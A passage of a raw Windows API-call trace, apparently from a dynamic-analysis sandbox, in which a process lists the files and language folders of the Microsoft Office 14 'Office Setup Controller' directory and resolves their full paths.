[0052.523] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PRJPROR", cAlternateFileName="")) returned 1 [0052.523] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Project.en-us", cAlternateFileName="PROJEC~1.EN-")) returned 1 [0052.523] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.en-us", cAlternateFileName="PROOFI~1.EN-")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROPLUSR", cAlternateFileName="")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher.en-us", cAlternateFileName="PUBLIS~1.EN-")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cba0700, ftCreationTime.dwHighDateTime=0x1cb7664, ftLastAccessTime.dwLowDateTime=0xd78c2600, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8cba0700, ftLastWriteTime.dwHighDateTime=0x1cb7664, nFileSizeHigh=0x0, nFileSizeLow=0x150378, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio.en-us", cAlternateFileName="VISIO~1.EN-")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIOR", cAlternateFileName="")) returned 1 [0052.524] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word.en-us", cAlternateFileName="WORD~1.EN-")) returned 1 [0052.525] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word.en-us", cAlternateFileName="WORD~1.EN-")) returned 0 [0052.525] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.525] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe", lpFilePart=0x0) returned 0x5b [0052.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL", lpFilePart=0x0) returned 0x5a [0052.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll", lpFilePart=0x0) returned 0x5c [0052.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll", lpFilePart=0x0) returned 0x5b [0052.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms", lpFilePart=0x0) returned 0x68 [0052.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll", lpFilePart=0x0) returned 0x68 [0052.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe", lpFilePart=0x0) returned 0x59 [0052.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", lpFilePart=0x0) returned 0x4f [0052.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\", lpFilePart=0x0) returned 0x50 [0052.526] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0052.527] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.527] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0052.527] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel.en-us", cAlternateFileName="EXCEL~1.EN-")) returned 1 [0052.527] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Groove.en-us", cAlternateFileName="GROOVE~1.EN-")) returned 1 [0052.528] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPath.en-us", cAlternateFileName="INFOPA~1.EN-")) returned 1 [0052.528] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6b277670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x8b7b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ODeploy.exe", cAlternateFileName="")) returned 1 [0052.528] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office.en-us", cAlternateFileName="OFFICE~1.EN-")) returned 1 [0052.528] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32.en-us", cAlternateFileName="OFFICE~2.EN-")) returned 1 [0052.528] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32.WW", cAlternateFileName="")) returned 1 [0052.528] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNote.en-us", cAlternateFileName="ONENOT~1.EN-")) returned 1 [0052.529] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x302b0500, ftCreationTime.dwHighDateTime=0x1cba073, ftLastAccessTime.dwLowDateTime=0xcf459e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x302b0500, ftLastWriteTime.dwHighDateTime=0x1cba073, nFileSizeHigh=0x0, nFileSizeLow=0x709b68, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSETUP.DLL", cAlternateFileName="")) returned 1 [0052.529] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x598fccf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0xb9a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSetupPS.dll", cAlternateFileName="")) returned 1 [0052.529] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.en-us", cAlternateFileName="OUTLOO~1.EN-")) returned 1 [0052.529] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6cee1d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="pidgenx.dll", cAlternateFileName="")) returned 1 [0052.529] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17eefe00, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0xbe99ad60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x17eefe00, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0052.529] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6904ef00, ftCreationTime.dwHighDateTime=0x1ca912c, ftLastAccessTime.dwLowDateTime=0x6cf07e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6904ef00, ftLastWriteTime.dwHighDateTime=0x1ca912c, nFileSizeHigh=0x0, nFileSizeLow=0x3d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig.companion.dll", cAlternateFileName="PKEYCO~1.DLL")) returned 1 [0052.529] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint.en-us", cAlternateFileName="POWERP~1.EN-")) returned 1 [0052.529] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PRJPROR", cAlternateFileName="")) returned 1 [0052.530] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Project.en-us", cAlternateFileName="PROJEC~1.EN-")) returned 1 [0052.530] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0052.530] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0052.530] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0052.530] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.en-us", cAlternateFileName="PROOFI~1.EN-")) returned 1 [0052.531] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROPLUSR", cAlternateFileName="")) returned 1 [0052.531] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher.en-us", cAlternateFileName="PUBLIS~1.EN-")) returned 1 [0052.531] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cba0700, ftCreationTime.dwHighDateTime=0x1cb7664, ftLastAccessTime.dwLowDateTime=0xd78c2600, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8cba0700, ftLastWriteTime.dwHighDateTime=0x1cb7664, nFileSizeHigh=0x0, nFileSizeLow=0x150378, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0052.532] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio.en-us", cAlternateFileName="VISIO~1.EN-")) returned 1 [0052.532] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, 